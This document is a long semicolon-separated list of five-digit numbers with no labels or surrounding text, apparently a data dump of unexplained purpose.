43156;38929;43303;50443;18995;46433;25646;38986;64810;25148;56073;38261;15961;41889;48306;57714;47701;22763;28756;34937;24897;24578;48680;26807;33677;53373;42671;10057;19779;40355;57696;20386;11592;63207;11444;54060;28947;18854;26562;23994;50130;57161;12754;47830;65650;34597;31191;30634;34328;40550;61948;20340;26727;52741;36935;16557;14611;39293;64917;48804;42148;15004;20610;17260;60643;13229;46370;56469;14565;63077;64391;29493;32905;21193;60493;65084;18540;38866;56536;36953;65399;23958;23862;55952;29576;40134;20866;39585;46084;14893;26557;30458;33021;16402;30431;66203;46351;63736;42805;10534;14265;38117;22058;51217;44761;66527;61019;51328;17555;36942;63224;21761;22345;35489;44541;45273;13412;36512;25584;56465;19352;24045;23742;16728;16064;47384;53035;57421;66248;62549;55852;66893;24626;45108;44133;28923;18381;51395;12604;56058;19008;11185;17296;16117;29983;53107;64930;58744;60828;28730;18344;50719;56449;41475;58974;58954;54922;43434;38294;30012;34509;63727;21764;45498;54423;13260;35965;47426;44421;31122;22529;56650;35359;13701;13356;17569;32100;20264;49461;43905;39699;24083;20162;27682;36558;20044;45408;62422;64127;35042;54269;13120;11193;45980;66207;43036;62476;10071;12756;31385;38863;28319;43178;18224;22223;52112;33607;20278;10564;60017;66949;61584;43104;56428;60576;56441;38461;25778;30278;30001;63925;10949;12461;43473;63639;60900;51848;44556;62254;19691;42501;48160;54894;30857;56608;36823;60247;17406;16896;56064;38815;65220;65436;21445;32379;16496;51572;23608;37538;31149;39800;19802;40456;40944;41195;42295;34945;13635;65311;56093;41419;60158;50874;42623;66132;28533;56120;59567;65580;51775;25458;66651;14726;29943;25779;30597;38417;40896;54549;62623;63847;14267;23352;52504;17535;12325;16511;51216;24451;65788;22011;46912;25869;61333;40338;25051;32338;54964;57640;27848;49851;36407;34190;31063;13480;49296;36155;20182;58689;26443;37453;29645;66927;23730;36654;25488;65760;21679;28161;27749;47231;56760;34462;17678;53472;48969;15793;19465;54771;42377;62596;27300;24773;11330;38061;66031;64735;13707;55069;48613;16085;62859;61912;16333;35162;58054;37777;18409;41338;19470;32786;28507;32813;11798;13132;19849;30756;30521;55799;11719;36913;55482;24899;59451;24674;29200;64286;66172;34821;23924;25916;14095;44623;47477;19541;16011;44831;22911;31724;46454;49700;48904;65318;59514;51042;58084;22100;47401;33190;16416;56136;32108;24317;26707;14419;64608;58184;23673;28897;43239;42129;52299;40344;61254;17228;31498;25081;34598;56951;28352;50733;63534;29470;19697;53226;43309;63071;22788;37501;25285;11770;17404;58360;31049;19537;59213;25416;49323;12781;51214;49290;16848;42264;40170;18912;53842;42327;46714;28333;19788;58387;48428;31571;35312;47083;56241;54430;45012;40552;19641;40610;64998;65669;35472;43012;44451;30566;33635;22916;51079;15230;14180;42874;34670;35628;65478;27185;18277;12687;56420;35601;51720;25030;39215;52972;51743;36597;45284;27350;25239;44601;48499;42912;39290;25471;25705;30748;60735;37807;46769;60553;34924;15925;64815;43310;10014;56750;56240;16593;22425;45015;53044;15216;24828;40176;61338;48465;40553;53288;14223;43441;12441;44915;55100;49889;13828;32622;22318;45627;54608;52311;45452;27676;50540;28894;11065;66839;63648;24273;15671;49680;40750;38621;36175;40544;58165;49169;23512;15293;55199;28515;54119;29697;32113;60421;65136;23481;30263;32170;11019;47417;45205;15201;42592;30019;37061;20650;58116;21865;28135;41831;28311;24533;23721;13769;40025;43553;43654;35401;64464;34601;12930;32027;11895;52781;32453;43415;66179;53114;53437;65846;30536;32021;11832;46458;36285;28811;58503;30428;63023;10126;56897;56300;58599;48574;13204;35395;36320;18139;61999;38225;65329;35799;22906;13502;21714;46096;20748;37853;56103;59336;11140;37690;33042;22521;58556;32523;38119;14676;22707;50474;32667;22052;33511;53956;12872;52585;40215;60225;48588;60058;19087;27466;65654;16470;48644;16890;48369;43560;36372;60793;66266;65294;63636;53476;42050;40205;27462;66706;26665;30887;12493;43862;57027;35496;47875;29061;57526;26861;39854;59287;51314;53577;13320;13051;16322;59179;66177;52223;14401;45647;15863;60258;45370;19677;14359;37263;41763;38429;23175;47811;24363;20079;31765;54882;10143;34783;16143;30290;56174;61475;18423;25053;46953;24668;28247;16122;12971;20035;53392;52725;35709;56569;31927;60272;54976;64345;22233;29932;24592;65374;49903;62198;31626;48181;19208;35636;66262;29640;35481;58319;48719;22050;35164;10562;45872;43088;60773;49622;54175;50429;50699;50925;57485;37858;48217;25879;57122;20677;23575;53829;23012;21017;22353;16454;64457;15379;11871;51963;55518;63098;42968;43282;34869;40724;32119;35385;29355;41579;22171;17377;20738;65042;55060;35802;51777;28035;52033;60008;51424;60840;36088;41713;57170;56472;38584;42778;15815;37463;14865;63942;34325;44654;61934;34098;16244;64026;43825;22373;17102;17457;13884;57416;34779;14200;62546;10196;63586;33692;26102;55907;42730;22281;52264;37685;29730;40885;63219;15036;47635;60914;28324;39363;18855;22277;65502;51463;55492;24270;26526;62204;30013;33111;20600;57089;48269;55160;62937;47418;20128;25689;45737;21750;53179;65239;64681;62259;59329;18147;26670;19967;45000;37018;32810;21702;45778;43901;27210;46545;45072;11086;54754;19787;47141;43786;17434;41469;41751;37434;30204;25939;63486;11694;26353;36459;32060;27804;56339;26211;46792;63546;41706;27091;20004;35081;42167;24720;61164;25835;25554;35521;40376;43259;34587;11064;14096;60753;54728;27819;14163;21739;32301;12256;20589;51980;57741;37719;19218;15280;15850;11542;13558;33166;65700;35202;48349;58021;65334;25611;25592;42884;37046;31636;26141;48442;18744;38881;60289;60746;23431;18148;49141;16430;30339;23667;61484;50955;50948;38176;48438;29543;23675;36970;20887;15402;25991;57154;13297;10176;37423;59996;23010;28421;44712;31775;40688;44583;60658;14464;49778;56289;20651;52241;54528;65845;44810;11500;55405;36231;62858;43226;41051;47435;29333;50671;57728;54538;37555;12738;33776;14784;26695;27993;38709;14706;54721;61825;40906;28970;13092;58470;66222;58680;12655;24261;31262;51700;24181;61002;55645;35165;23073;39867;38011;60235;23714;25207;55756;51579;42972;60489;20103;28364;48645;22850;30437;41989;47482;60134;18240;38247;26090;54258;42332;47172;62021;57469;48825;66532;61852;53270;49786;24911;53262;20620;12759;18653;50310;24620;11587;33780;65514;23396;16462;18353;12514;26032;57651;15680;17822;34787;23505;57980;52738;16173;62648;43217;36398;39237;23208;16669;49498;52645;38059;14283;64933;22064;18194;53130;32764;16975;45806;58365;43029;45779;17424;63063;59989;30284;29027;30875;16562;46236;44744;57611;23888;43149;22500;64476;38635;16813;56252;44822;16883;19109;61157;25225;47377;29138;50614;18553;30159;66061;15819;39138;47112;20461;51762;49113;12496;43715;31286;16465;57300;33441;14122;39573;17799;12744;51990;15731;50660;58603;60139;39446;43571;31234;30005;52225;55544;15967;59665;10722;36541;17754;26177;29219;45139;21804;44240;37230;21372;60503;57218;20229;18268;32208;31629;19704;12508;63171;58590;41351;65384;25103;23055;61716;21590;30070;42766;63849;30395;44673;18401;56408;34316;13675;64294;29967;34819;42298;26569;26635;26281;11199;11459;30209;46453;64688;26908;55582;53504;21325;26700;32089;11866;46431;39691;38489;30139;32409;10660;25859;47190;63705;13161;66607;18354;44515;58445;50129;10891;17024;60675;39196;55573;40778;26094;41374;61249;25438;57392;10743;51801;56494;39311;17295;27860;56316;32963;43996;28745;25538;18570;45486;58361;59618;57401;16471;12094;21895;18298;35957;40606;53527;30956;52027;14905;65632;54280;46709;39728;24331;66398;56877;41478;47515;49405;28264;37229;59177;52343;27203;62158;22300;13306;58761;37857;57880;16696;58567;56509;13256;27556;61593;35152;19464;39597;30235;63282;11175;17189;25954;51927;52316;28921;40145;24142;32365;36801;55090;33284;33041;23006;41366;42992;23260;19842;25481;29417;20618;57946;32026;14507;53069;12249;42199;29546;63820;55126;58859;19231;40745;44323;65340;48245;10827;22211;32499;36870;45649;39968;44887;58972;14526;15520;20167;62901;58201;44435;56065;31983;27951;12310;46485;61137;41700;57462;29172;36387;22354;50152;41539;11639;63939;21789;62312;40871;40127;40309;44693;14300;32323;28233;44561;15977;54114;53167;33527;16554;51446;63899;28124;23723;66754;48152;48311;33463;46352;45914;42185;21242;44167;58155;24208;10898;50207;35538;46949;17286;13503;16707;16845;20939;50229;18393;25972;34588;41257;23841;43509;58270;49741;35492;57737;31109;18473;17557;61433;25354;54093;50506;59082;53656;46274;58621;22744;21412;49312;14723;59580;19202;53950;15856;10693;56973;28388;23205;36765;39060;60684;59425;49685;38767;15096;39871;46670;10591;47803;21218;30745;22880;34711;30902;39106;24061;13101;37560;64136;14137;39136;39886;37633;54132;39014;47035;45719;61285;29180;10750;30099;23514;42015;44043;45674;23771;19446;57870;48425;14916;36176;44934;66199;28603;30027;30539;33423;49088;44488;47502;44574;43728;32424;18691;36109;20635;22747;55889;15974;11801;16203;20391;37364;64575;55406;34723;14921;13643;22901;49617;24928;48782;48824;59816;50668;20288;55379;27274;52074;41737;26758;35840;47331;59770;24471;64037;29895;43839;36544;49974;12434;53563;26133;14950;23874;60872;25612;30248;27789;66474;43494;43234;30830;12335;26965;29179;51287;15168;10996;57221;59420;44105;59704;64051;38865;40805;43410;51650;15518;39893;66495;46140;49831;49020;60095;62960;57713;31069;40230;12476;56100;59458;56413;16387;14210;40953;25095;30429;41118;37283;51093;13586;56544;54472;50571;54250;26788;66268;30173;25426;59992;48955;22161;51921;19966;43628;44224;63748;58928;37497;14710;22287;57312;27999;57294;61175;27624;46068;52410;57610;22592;30716;45675;33798;54405;11781;25152;46813;55522;46348;25975;45097;63326;46541;28883;32785;39828;65877;49737;31241;37278;63612;60530;33837;66220;27068;54547;52538;31923;62747;49881;47548;22655;56922;22055;58715;16263;52914;24096;58482;64229;50866;29955;41223;24534;50404;19612;25378;23661;19018;24428;34794;43775;55196;24161;39763;37235;23895;52569;56161;32558;54835;30472;26637;57145;57918;14918;32657;12539;51266;48327;31297;39698;64927;49398;10849;56040;32186;56123;56570;65317;52979;63571;22081;52684;33507;10973;46602;10166;42760;25902;46316;57074;22541;40545;34947;63500;49166;20125;47557;11707;31801;39417;61220;58203;65325;42337;49503;28177;49964;19479;54979;51876;57928;32495;53843;14624;61415;62255;66659;15382;55167;14717;27515;62197;58563;31357;52707;43865;30936;56482;58342;46210;27344;41071;63835;50595;45245;19985;28001;64130;37988;28836;46902;18335;41369;51137;35695;17358;24009;55324;28988;49308;58964;51092;40581;40335;19046;24418;60924;61031;60825;37926;17800;38329;21470;31143;16697;34351;21318;62784;31938;29331;30901;58591;57826;62069;40002;55676;12615;31375;60532;48381;53920;14312;52026;34962;30502;15852;28724;49311;66545;52801;52054;40284;18273;38331;47476;32180;19020;63332;53109;50338;30535;31609;33543;17298;40178;64521;24852;64246;28954;64990;31057;16380;27329;35598;29369;43610;38688;63234;55187;34138;60124;65156;18941;25219;60488;52029;60437;35619;63530;19924;40149;56491;42455;45594;59296;51887;23559;51168;65677;11786;22536;18462;44567;66515;25482;16222;13763;52461;28073;36360;13812;18025;66933;64118;14739;43271;52500;28726;46795;29123;53276;26164;32416;52757;32751;56892;29519;25042;39399;29449;23266;49668;53380;19447;13937;11130;17513;57775;54572;62389;65454;17563;64899;11410;24082;66834;25820;14462;30881;62151;15770;41311;32727;40488;55685;25628;25815;57862;39964;60151;28213;28792;48907;50745;55269;30641;24169;22172;57178;24034;30712;44634;19744;21850;45915;13096;65390;41554;52566;29901;13018;15883;13095;36403;45369;38915;38153;55911;10654;60719;51300;63804;62977;38155;58817;45667;15728;10907;28357;61331;61787;13813;60059;18251;19442;64687;57417;65908;42086;36865;61196;62621;44312;47461;49529;65626;20397;59436;10895;29992;33747;12933;19110;43758;63872;27766;23456;61206;46535;58889;26370;52921;39172;32820;24445;62240;37276;25818;36659;53176;18590;49165;28855;43891;10651;41471;64318;14123;11362;43100;18408;33726;33413;22864;28246;12610;15279;62296;54523;29476;37262;32817;19289;47301;30851;46790;27389;40753;25375;34115;35506;50774;37994;48702;11454;12652;49984;35797;54590;63093;15397;61882;38457;47526;54859;63602;24024;40448;37033;24174;15055;55101;10816;57858;15687;31544;32308;64510;63564;45380;46700;18304;43740;63060;49785;53945;39415;66018;36437;41479;13980;58730;40156;60244;29733;43211;63652;45909;52909;53295;38115;38980;32718;43994;58966;16277;21773;19613;54131;43114;40484;59344;40521;48830;66157;31055;23746;62769;46251;31306;31963;25677;41392;46489;56884;46628;31831;26777;21811;48784;44194;38245;50837;66174;42659;45673;52773;12737;46942;16012;12438;30552;63668;37825;59909;58898;45878;19751;56267;48291;16565;23158;28012;61456;38750;20354;66239;44309;26628;13513;37388;47090;30693;50738;45928;61563;54123;66564;45203;41221;22328;53705;13158;62625;52596;30651;59677;41486;18083;37121;46640;40035;62827;62941;27173;41279;34071;40658;52723;12241;12842;46309;26996;13022;13258;14203;24122;40540;32934;42878;13778;43069;33545;31432;17370;23880;64913;47704;20500;48197;66533;65036;27810;45506;27448;44715;22053;23493;42886;50965;63000;57731;39381;15331;21515;57018;35587;59465;37011;64611;51063;36489;47754;53007;17584;36653;39520;26276;66946;62363;11734;62774;39631;14705;66282;48507;30616;25340;48392;26194;44154;12011;59146;52546;36693;48803;40133;43600;48419;25169;12925;14152;43464;39668;20947;62602;50003;14258;38654;28157;60402;35059;65652;11174;53185;53701;57622;37998;15942;66384;10420;35446;45850;21898;38650;62339;30435;50022;52508;30076;12771;39555;52544;60889;21671;58196;28171;24688;22276;58942;43883;40813;15047;21716;10105;50325;37307;52381;34177;20835;12876;13475;18467;62629;27288;12309;27306;12124;24027;62172;33702;54170;32361;58260;13818;40656;34243;22083;36033;38931;50283;16908;10993;39283;64000;21169;35620;50436;65645;62731;49154;46728;37930;13045;51171;26652;62523;56332;55414;31824;17364;10762;66471;16897;65591;65881;32626;36260;57838;16053;26420;14269;52989;27341;33031;64371;65558;49030;44924;54009;65223;63799;17494;46752;40346;59631;27052;10250;37662;40114;53596;34580;27713;40757;29475;15733;46935;58299;56606;56530;24708;56803;63210;63321;63183;52845;27665;58533;60072;32400;53228;22273;17475;62362;38338;10754;42922;32203;17168;30865;42596;37045;38005;53809;11499;61513;39987;53310;56116;50128;42201;49036;43904;29256;13639;55260;44962;58593;66071;53148;25754;46062;66158;51688;19535;65615;23358;60711;47153;66753;11996;60911;38302;24202;60604;13630;56523;65114;21332;14845;29141;18564;25328;44545;31350;22227;53730;58466;58188;48161;27264;36604;48232;52053;43129;38400;37657;46402;20268;19422;45347;21632;62779;17164;54884;45986;63225;35079;62662;63844;42140;46242;65546;43686;37224;20891;52269;30825;20434;58529;54082;41466;56360;38165;14478;62978;60109;57921;28772;35583;50771;62276;54860;39554;47632;31588;43619;61947;25161;64048;60631;16450;58670;37268;27590;52609;43041;20649;39098;12583;49292;52129;42431;48748;16625;53570;51853;41746;35375;54487;26641;39166;12409;50079;44314;17297;30831;20156;41648;53658;40713;35028;37299;36639;17994;57352;40947;36304;59126;57402;57051;22040;37608;25722;43240;28393;50936;19585;24089;54853;56924;43990;38276;55681;61449;59151;43908;47452;62835;61713;27383;33801;51318;14314;35384;28830;52534;31206;49636;24155;58515;47680;13172;43777;53381;61335;26003;43952;56956;48234;43847;25073;50037;31899;33855;16619;25446;35136;23026;39043;48728;39053;12770;50215;46087;37789;50147;31668;15666;38272;23858;38797;35856;41711;15841;65039;20384;49919;61936;29522;17207;31857;22154;15988;61308;33004;66073;65556;26099;47486;32555;41391;25868;19038;40495;35585;32847;52705;26916;33669;33331;61046;29646;66284;49233;45700;56853;20171;26682;57271;62065;20716;64754;44187;44232;60540;52885;56845;40436;30117;10493;58640;59205;47562;42863;16323;63239;32313;30471;40527;42374;61867;14620;42502;47831;36638;48717;41079;15085;18426;23729;12899;13380;29173;14994;25102;57434;33171;53082;32861;42150;22332;23351;36663;25768;46762;45662;43486;63698;42485;57702;52789;53565;14640;22896;24941;20114;39075;65045;47677;66355;23494;48384;41974;34105;56979;24728;64433;45677;33062;15905;37805;20655;56515;61007;58882;64449;36984;37706;57399;47457;27463;65258;43111;21393;29136;59976;40511;44891;64383;22225;15429;34576;27818;26650;25425;10681;46490;66352;21827;32375;34330;25262;61177;50650;40651;28300;10049;35732;42633;53079;32600;48899;49100;59660;34564;56229;58606;33599;65043;51866;15178;30307;40764;37645;44419;49063;42700;21822;60533;52542;59608;37297;57189;15346;49126;31168;65157;40649;49578;29621;29707;46632;57427;31589;47667;43691;51365;22846;25607;20005;60490;47801;12366;42644;66889;40157;47727;25583;13550;15911;54506;47322;36229;11492;50532;53869;11687;64185;16572;43681;17492;60464;21222;62124;22142;31081;19685;43909;59187;26675;10252;39748;31916;49294;23637;44984;30893;66915;42892;21512;48336;55542;23909;55874;38327;14944;64959;37440;50387;43037;42695;53146;65916;50786;59741;19467;27351;42160;65498;13835;30814;15152;22808;20502;44737;37491;38177;16985;36346;47228;24661;41505;59762;24044;20888;46855;29271;43924;61748;18165;52080;59690;23695;34322;63661;11096;64377;45316;20106;42930;47276;46577;33163;65000;41556;17292;30692;15866;44793;13932;14165;39091;24949;65345;42234;27646;51307;52899;19637;56991;22234;54428;43946;55887;49917;43874;10097;41213;66408;20941;23062;23269;49702;27992;55079;57229;11117;22616;21173;64617;33560;12707;33419;19211;32438;54866;66051;32053;62406;18128;47146;34899;10443;29017;13118;40963;13013;37979;62611;11157;43535;49631;53034;18131;33231;60416;58909;36396;14560;26190;22243;13451;54817;13627;16081;12553;41952;20498;63206;19299;16711;38906;11460;33112;61908;14549;56887;55876;31051;48915;20100;63421;61364;12777;54504;53700;49825;25088;29294;59808;53417;37411;48260;40743;46004;43353;29112;40616;53244;14797;52412;44708;20961;31326;31254;44906;27685;17725;36253;53039;25802;15128;60399;59442;36012;15877;46295;28562;36371;58366;55008;58304;11746;59589;32482;63916;50993;34412;17386;28007;48895;20184;22367;49135;37167;53994;36103;49353;16675;56728;46373;31568;43653;22378;15086;42339;12805;53910;25929;21125;22403;31625;28500;25809;36419;24517;48273;57924;62393;56345;33406;28920;66741;29015;57196;38017;36321;18641;15156;64675;24881;20815;63885;64805;28956;22534;16634;66124;50801;12775;33224;21946;38945;21482;61061;63029;54971;52107;19678;27689;24824;15593;56635;33999;11030;33900;25278;61968;51674;31405;26298;21779;18125;12577;27150;25241;52951;29851;34600;40084;40091;20208;54089;38014;43249;39542;64214;37702;22520;49348;24539;42251;27643;66605;23340;33628;17121;58001;12972;32672;43261;16506;50390;38270;12331;52943;42991;36614;61654;50873;64204;32912;28301;30436;46797;41633;58039;33288;35406;52444;49313;51044;40703;37816;29863;59022;30220;15408;21188;42500;37545;32015;27452;61863;62641;25648;66783;23649;17782;49635;44460;31973;57361;52574;31856;20491;59794;57055;31273;25218;22989;19323;56432;36198;40567;15312;45565;34041;26178;29106;64504;41956;36294;59103;19180;25046;51164;32322;63443;58443;30703;38984;19817;55460;14081;58112;38388;65269;13775;14680;37727;26546;20877;51517;42383;50410;28829;60463;41349;57979;26926;41022;61097;17073;33253;55376;46555;32221;34966;65075;23126;25198;60901;66116;55317;61221;43941;65836;18163;34244;35054;49901;50264;11242;24392;44536;61696;65028;59312;15565;62897;53985;23087;22096;26238;11260;62674;10531;25955;55746;61033;56622;19414;36945;18733;11144;35355;25109;44507;55948;35154;39313;12743;47853;26805;59766;25316;10941;21598;64425;23013;10844;13961;53260;35210;64257;35906;57707;48182;33430;25098;49337;31552;36500;30357;41835;39971;31296;44684;62633;36610;25796;28353;28259;59907;27454;39152;52277;19726;15319;52249;21565;19261;33489;59292;62807;42957;20338;58416;19232;22179;25401;47893;33026;10616;40014;59209;16514;37872;32095;28229;20451;53097;51678;58917;23203;22716;55531;61681;59237;33202;17729;30765;58881;19090;41180;54305;64514;41024;51536;45923;60176;62973;56489;53360;46808;52658;47158;40039;18988;23401;19129;56364;22899;57407;22327;64066;43684;60499;60739;11914;16831;41635;41007;41788;23245;11345;23860;32283;45784;20136;16663;39302;12913;28789;22402;16458;66898;31129;28907;42144;54151;24192;17031;39231;36036;25786;22126;56823;50894;37549;10932;12608;10506;63791;18842;41316;33868;30507;10840;49494;17640;17840;34034;66681;39810;41682;65874;37919;58257;20057;65962;63909;59193;15805;54932;24162;42634;32264;12478;61938;40285;46263;58949;43233;60282;61277;26991;24454;60625;36906;26889;27017;56222;27276;27400;41497;50419;52426;26030;23885;53599;31393;12354;10648;51567;55775;39569;59282;15049;25771;49112;33633;23308;24288;43186;15611;26387;63821;32587;21336;19142;42103;51215;38891;26401;24077;51192;60824;34441;27189;38794;23390;43210;39707;29930;31452;37072;20601;29861;16250;50962;48700;55166;49489;66850;42403;18107;62789;38402;42198;22675;33215;41953;66118;35259;55845;48385;49122;48329;12468;43911;22969;18936;41017;29741;40942;50114;11624;41230;56272;39658;44902;37661;54198;21277;43747;60082;11906;60435;63304;57482;21244;36137;60054;29340;27038;20509;19914;30043;38496;21832;64329;35710;64242;24957;18515;61501;13908;42221;17080;62743;53320;40220;54395;40037;50055;11931;55202;46705;62909;60806;20637;56625;49061;33564;24612;46615;22124;61393;61237;17995;63320;38346;24336;23789;31817;46356;35836;17103;10578;16505;51089;35902;42795;42903;60836;29379;64044;28450;55581;53820;25470;36642;50455;55346;34132;43843;58552;49279;44003;56208;60460;51132;40886;58436;55423;45199;29838;19755;30754;23385;55997;20992;44892;52175;53151;19979;37744;26654;45523;62064;65273;36146;29945;45123;15321;24154;33971;46778;54925;61683;64756;30118;43969;54577;28224;31216;47537;31907;48426;13100;22213;29266;14145;32290;26056;40183;39811;26127;39230;63744;56701;29025;44208;16853;55353;24391;32506;36712;17403;37109;60597;21659;46643;23275;65204;14653;32938;34271;58662;62082;14847;37324;52671;38333;10656;34053;42225;57777;22514;61607;52108;53909;15197;14497;16771;51965;43791;41761;22840;11524;35465;28423;24415;51942;16213;61941;53921;40579;57817;43696;49184;52151;21698;54455;51357;39137;32394;11239;35503;14360;28208;24489;54266;43092;61339;12482;20111;41969;42637;61659;24847;31911;36773;50798;33220;21016;17453;46463;39995;42964;54115;30363;63938;61594;33114;57932;46774;43641;48903;51484;13974;56889;42304;35013;16962;60071;15812;58820;25964;13303;19632;50062;61599;16421;44995;46462;57516;55930;41960;34724;14391;39477;65968;22912;41129;54955;16091;52667;19866;11599;27473;24845;66498;49547;25624;62896;38925;10695;24866;57053;64437;40419;25317;28109;56114;60966;26834;23399;64993;15955;43877;35675;59524;36652;34283;49467;49812;31991;65815;63022;29488;64054;41348;47857;43545;27591;36147;20197;33842;59251;42402;50958;27171;30281;41674;57686;62161;24914;32986;50138;61429;11605;31555;25923;20260;57440;46924;53814;63167;29534;51193;34839;32946;10426;21308;28400;65255;44636;53715;36667;11388;18868;62763;42175;24812;55683;21421;55693;61495;22084;62371;31022;66505;22540;60577;25887;23072;52167;31359;15193;44437;47851;21025;59413;47506;65211;36907;49297;16519;14683;38325;55919;58722;11911;57658;10715;35590;46638;22781;58547;43199;15854;45440;10297;28165;58629;25847;12340;17417;45279;22619;12001;24677;12255;18326;26057;21477;49096;40989;44020;62133;33091;56263;65816;65864;43841;19326;36013;35577;21091;38083;46737;61228;19171;29603;12369;26797;39904;43099;10696;51111;21509;19705;55310;39353;26955;40582;29996;60291;29073;42970;46650;14801;65883;14509;38747;42453;55534;30140;61232;33802;57594;33612;36581;41919;38421;13099;26982;26059;66060;11358;17467;39765;27083;34086;11051;22151;51163;60865;58465;59572;59563;54872;32350;28913;13234;50298;23200;55437;36503;15356;52489;49425;60306;66120;54298;62301;24424;21667;17596;40172;14030;12126;29013;44682;60378;41566;28473;19094;59750;17354;61425;64838;48218;29074;39328;51047;27381;58999;12363;66542;10916;24733;50744;42997;41377;49236;36848;26180;45144;56782;19401;19797;51100;36174;36734;53936;24241;20511;20215;15160;26815;45174;36833;30272;58458;35041;16642;31365;48998;25503;15591;47099;66091;63935;14216;33429;20796;40931;58115;29751;65500;35097;55809;30848;29642;43971;58104;50923;62653;24123;20202;61866;35265;22867;56591;66704;41833;19819;28565;45750;49201;24467;33199;41189;34814;27211;18104;39447;22560;17542;18648;37470;56503;30480;40013;21856;22385;16750;47490;34143;50464;54806;18663;48991;36024;24115;66613;44728;26842;54559;60599;30137;40466;48829;50102;58840;42209;32840;30585;45187;28828;25273;25517;60784;44462;54159;59765;49671;56532;50886;21469;56387;29363;38397;30136;11139;64612;54479;37781;19060;53598;22481;37037;21322;52300;24381;24563;19043;35261;55143;25522;55087;28994;27843;20049;30310;14750;65992;35390;11577;34769;60301;41252;52591;65181;50496;52389;46864;44073;23075;49484;29235;66829;15659;57182;48659;65066;11908;26053;60485;65709;30047;26690;44412;43457;31268;60546;11152;19312;48701;26271;21910;30697;34524;51811;14566;16016;50813;32391;37931;41548;15555;41715;64497;60525;25077;37975;59058;62529;28190;34688;51525;51401;31605;30353;46332;12333;47313;49584;32396;37200;53558;18225;27453;44432;53252;40965;25212;24814;24580;64283;49205;52498;54331;21438;22366;22041;28414;32513;10371;12572;40047;30805;63922;36083;27729;64310;55387;36585;37280;29735;25732;27335;43949;16371;40103;36955;56349;57423;33350;28793;50899;27029;37804;64367;21472;20542;61145;35515;22816;56148;46584;56561;58781;31844;14218;30007;12951;48843;60663;27763;14309;40189;53204;53158;65824;16651;28588;65467;21722;38432;37613;23257;54409;53299;26629;39000;54980;31124;54760;18137;64821;66660;46556;61453;24679;11766;50323;35614;18543;32353;63674;62961;57662;25931;31738;30846;25135;19222;44328;51364;55786;52275;54129;45145;24292;40444;59739;18081;50495;61723;36844;40486;18644;39320;52983;44282;23467;33362;16605;32340;37001;37577;58160;57994;22815;31203;34453;28584;64717;55473;18073;24737;59165;14229;27592;32677;47395;10901;62656;18044;30942;18057;49843;24416;59724;44600;23517;17633;12630;34227;21676;55622;63489;66793;52428;56914;45937;43658;30111;11261;32398;36114;50947;63164;57763;11375;46218;12993;25024;39066;10152;52588;55238;22185;57179;55407;62803;12923;14338;13762;12605;13863;44874;29918;33063;50211;43964;34964;34726;35368;14428;45443;10002;12891;26595;40851;17532;47601;12826;32620;38708;66324;22051;42628;21846;54635;65251;52812;50058;65925;23225;41666;53322;52831;26108;53505;18269;61371;54807;33950;24691;18981;55877;65064;61252;45026;27075;36411;46702;57069;20510;59701;30462;16251;47070;16029;23903;50177;13568;47800;44719;11176;46467;66923;50195;63091;43483;26579;35523;52686;50661;51547;33294;37168;35825;16612;32695;63457;66064;21039;26391;41789;56592;12407;10985;42114;43627;50012;42123;36713;57324;40206;20662;25560;36399;65418;55157;54274;44609;59299;37435;34554;45505;31901;46894;54352;41724;44087;63763;41077;23754;30632;19016;12784;28810;62460;41542;13621;60136;54473;39593;13806;42215;29343;57644;60743;31897;46594;14936;53923;48637;36686;40862;65698;58601;53183;58390;45137;30275;25970;35337;50269;10577;50450;43688;48248;14662;60702;22460;34409;29759;39470;13491;26612;19901;23971;29907;51696;21743;60608;25230;39452;15936;23536;65129;55512;65331;42800;14802;51414;48433;36234;55862;34261;17288;39132;59784;32349;54586;11619;35998;66063;52879;17070;63449;11612;23702;39040;42060;53760;17282;33085;12988;58108;51224;66873;59069;14062;43763;31053;23647;32872;49695;35531;30050;63367;32099;66678;14531;45941;36871;47179;11526;64758;21608;58473;31834;60042;30963;20352;31189;56881;37438;43940;45589;33348;58336;22380;43662;18549;42630;42635;30723;66743;56600;63081;28766;16385;24296;42581;15824;15430;31064;63371;15265;22015;26899;60120;34357;25793;11629;30630;15534;33098;56439;30854;14366;60379;46550;13178;36529;64841;63708;18681;44136;35510;30607;55195;57061;51273;10790;38160;41572;17074;50978;29262;51112;45116;28282;31239;21909;44308;43767;45479;21121;53939;58983;19189;12912;41389;22121;47556;41922;44602;47523;12911;65382;13453;64659;32464;56809;66164;58526;10346;63301;65336;22790;49630;45776;16033;16971;32668;37793;57978;62676;10744;25516;46110;47220;48793;50768;47072;41774;10462;35831;19469;17122;37944;49979;64944;46554;53000;12625;17650;11022;51303;64979;15131;52404;38356;26636;47615;60572;13708;32049;50931;40971;25618;16613;38249;23300;35973;28042;36464;29067;54139;44865;44175;40687;43253;41613;65324;19017;43980;24378;52869;30623;49471;10402;21310;19420;60066;60875;57323;46783;43476;29968;60934;48590;52069;15246;52142;28934;17275;18785;47673;23938;43176;32845;57286;43594;58641;31085;16809;38086;28410;22065;60814;16995;19620;11764;23741;65997;13682;26318;16591;17761;29572;52073;58226;62518;44644;34644;42482;32696;51178;27095;12959;37271;15129;19608;30919;62702;53655;65852;22020;43611;15872;16955;49738;16319;28552;56644;50216;63775;60633;48506;53808;53611;33979;24104;62403;38519;41196;23079;24001;64482;23098;66053;50011;58147;59984;54295;11160;50953;14191;21693;53893;15893;40837;30561;14610;42954;23470;65822;32975;13737;47399;43692;42865;64187;57567;51356;47768;20159;26939;38375;55464;56232;61205;60870;42291;25495;11255;46419;20135;14090;41150;55980;36745;20568;18683;31865;62080;35376;12633;58460;28433;55094;26666;10957;26756;14104;57148;38066;49187;48513;39129;23438;45809;34200;20480;36786;19182;47747;58891;45859;56160;25125;29240;15472;20016;14292;44189;41258;42660;15862;58138;42769;46617;55127;62931;21353;20751;50903;57356;21263;62141;39610;39092;11297;22919;21586;48767;61791;55807;64480;28478;32874;66267;62057;52022;39672;31089;40765;24343;64850;27212;44012;20897;63218;48763;57834;14911;36692;62799;35968;41783;32318;42133;16048;18255;13624;65863;33033;16741;48183;56445;17027;18482;40796;50122;62751;61481;35877;45900;60248;61686;50360;21726;13881;34963;22685;26880;55960;20250;54166;43116;13957;24523;22718;56904;30058;53012;37700;22796;18761;23001;42354;37493;44922;54957;24969;50164;55259;59363;30913;44343;61662;46914;51915;34846;36297;59300;30252;52982;56238;37897;36864;15653;23793;53743;54972;31619;52174;30160;30292;38319;40256;25926;11465;23716;29145;42506;13001;19297;11872;29681;17805;27828;59833;20611;41124;24876;23640;27599;30217;22299;46943;13795;34312;50715;41577;25532;34972;45985;61845;16815;13965;48999;55682;45040;30743;44540;10422;29782;63975;33963;38256;47034;29625;26554;